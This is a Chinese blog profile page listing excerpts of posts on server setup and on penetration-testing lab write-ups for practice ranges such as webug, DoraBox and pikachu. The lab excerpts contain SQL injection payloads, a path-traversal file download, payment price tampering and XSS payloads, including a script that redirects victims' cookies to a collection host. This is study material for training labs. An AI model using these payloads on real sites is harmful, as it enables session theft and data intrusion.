自定义博客皮肤VIP专享

*博客头图:

格式为PNG、JPG,宽度*高度大于1920*100像素,不超过2MB,主视觉建议放在右侧,请参照线上博客头图

请上传大于1920*100像素的图片!

博客底图:

图片格式为PNG、JPG,不超过1MB,可上下左右平铺至整个背景

栏目图:

图片格式为PNG、JPG,图片宽度*高度为300*38像素,不超过0.5MB

主标题颜色:

RGB颜色,例如:#AFAFAF

Hover:

RGB颜色,例如:#AFAFAF

副标题颜色:

RGB颜色,例如:#AFAFAF

自定义博客皮肤

-+
  • 博客(10)
  • 资源 (1)
  • 收藏
  • 关注

原创 kali下安装whatwaf

git clone https://github.com/ekultek/whatwaf.gitcd whatwafpip install -r requirements.txtpython setup.pyecho "root" | python setup.py install

2020-09-16 11:12:01 1044

原创 centos配置阿里源以及安装docker、docker-compose

配置阿里源下载源安装wgetyum install -y wget下载CentOS 7的repo文件wget -O /etc/yum.repos.d/CentOS-Base.repo http://mirrors.aliyun.com/repo/Centos-7.repo或者curl -o /etc/yum.repos.d/CentOS-Base.repo http://mirrors.aliyun.com/repo/Centos-7.repo更新镜像源清除缓存:yum c

2020-09-07 10:41:18 290

原创 阿里云docker镜像加速配置

阿里云docker镜像加速https://account.aliyun.com/login/login.htm,登录阿里云先获取个人镜像加速器地址针对Docker客户端版本大于 1.10.0 的用户安装完docker后,您可以通过修改daemon配置文件/etc/docker/daemon.json来使用加速器sudo vim /etc/docker/daemon.json{ "registry-mirrors": ["https://xxxxxxxx.mirror.aliyuncs.com

2020-09-04 19:23:20 189

原创 webug靶场逻辑漏洞篇

越权修改密码先用admin登录,直接得到一个修改密码的界面尝试修改admin的密码,用burpsuite拦截流量包,可以看到URI中有id值,猜测这可能是验证用户身份的一个手段,因为这里我们知道库中有两个用户,将id修改为2,新密码改为我们要的密码在burpsuite中进行修改密码,去数据库中查看,发现用户id为2的用户密码以及更改。支付漏洞抓取购买商品的流量包,可以看到price应该是商品价格的参数,这里我尝试将100改为-1,发现我们以-1购买了商品,这样我们就可以用任意价格购买商品。

2020-08-27 12:37:31 1272

原创 webug靶场任意文件下载篇

任意文件下载查看下载的元素信息,发现file函数进行下载文件的,于是将href加入到url后发现,弹出下载文件的框,这样我们就可以下载服务端任意文件这里我知道目录下有一个1.png文件发现可以进行下载mysql配置文件下载由于我用的是wamp,所以配置文件的位置有点不同这里我是知道配置文件的位置,所以就直接用了这个路径file=…/…/bin/mysql/mysql5.6.17/my.ini,在实战中更多的可能需要自己去猜了,经验的积累。文件上传(前端拦截)先把php脚本的后缀名改成允许

2020-08-26 18:59:45 414

原创 webug靶场xss篇

反射型xss首先观察了一下页面,并没有发现输入点,但是经过我敏锐的观察力发现url中id的值输出到了页面中,果不其然漏洞就在这,直接插入xss代码。

2020-08-26 15:35:22 431

原创 webug靶场注入篇

注入显错注入单引号报错,构造闭合,payload' and 1=1--+与 ' and 1=2,页面返回的信息不一致,由此还可以判断出存在注入,用order by查出字段数为二,union 联合查询找到回显点位置,带入select语句查询。查询所有的库名payload:-1' union select 1,group_concat(schema_name) from information_schema.schemata --+,这里查出来的库有一些我在本地搭建环境中其他的库,其中informatio

2020-08-26 11:03:21 836

原创 dorabox靶场writeup

靶场搭建这里我直接采用Windows下的wamp集成环境,直接将靶场源码下载到本地,解压到网站根目录即可。网站源码下载地址:https://github.com/Acmesec/DoraBox数据库的配置,修改conn.php的数据库连接账号及密码,在本地数据库创建一个pentest数据库,将pentest.sql文件导入到数据库中,在创建的库中执行source D:/wamp/www/DoraBox-master/pentest.sql即可,到这里靶场就搭建完毕。作者也在github上有制作了do

2020-08-22 11:14:08 1147

原创 pikachu靶场之反射型XSS(cookie盗取)

反射型XSS尝试payload发现存在字符长度现在,使用F12查看元素,把maxlength属性改为足够长。使用最简单的payload:<script>alert('xss')</script>,出现弹窗,说明存在漏洞。利用漏洞获取cookie实例操作这里我们用的例子是post型,get型利用容易被受害者察觉,因为get型只能在url中插入<script> document.location = 'http://127.0.0.1/pkxss/xcookie/coo

2020-08-20 11:29:36 1945

原创 使用wamp环境搭建sql-libs

1.首先下载wamp附上百度网盘链接,也可以去官网下载链接:https://pan.baidu.com/s/1gMiT94AbIqDfwrVHRPouoQ提取码:h1u22.安装wamp直接点下一步选择路径,最好不要选C盘,之后如果要保存项目的话会占用很大的内存接下来点下一步就行finish之后任务栏的这个图标为绿色说明环境已经启动了,若为橙色表示还未完全开启,若显示红色表示未开启...

2020-04-05 16:48:19 610

WebScan.zip

使用python编写的web前期收集的源码,主要是用爬虫技术。多线程的网络扫描器源码 不错的学习工具。

2020-05-25

空空如也

TA创建的收藏夹 TA关注的收藏夹

TA关注的人

提示
确定要删除当前文章?
取消 删除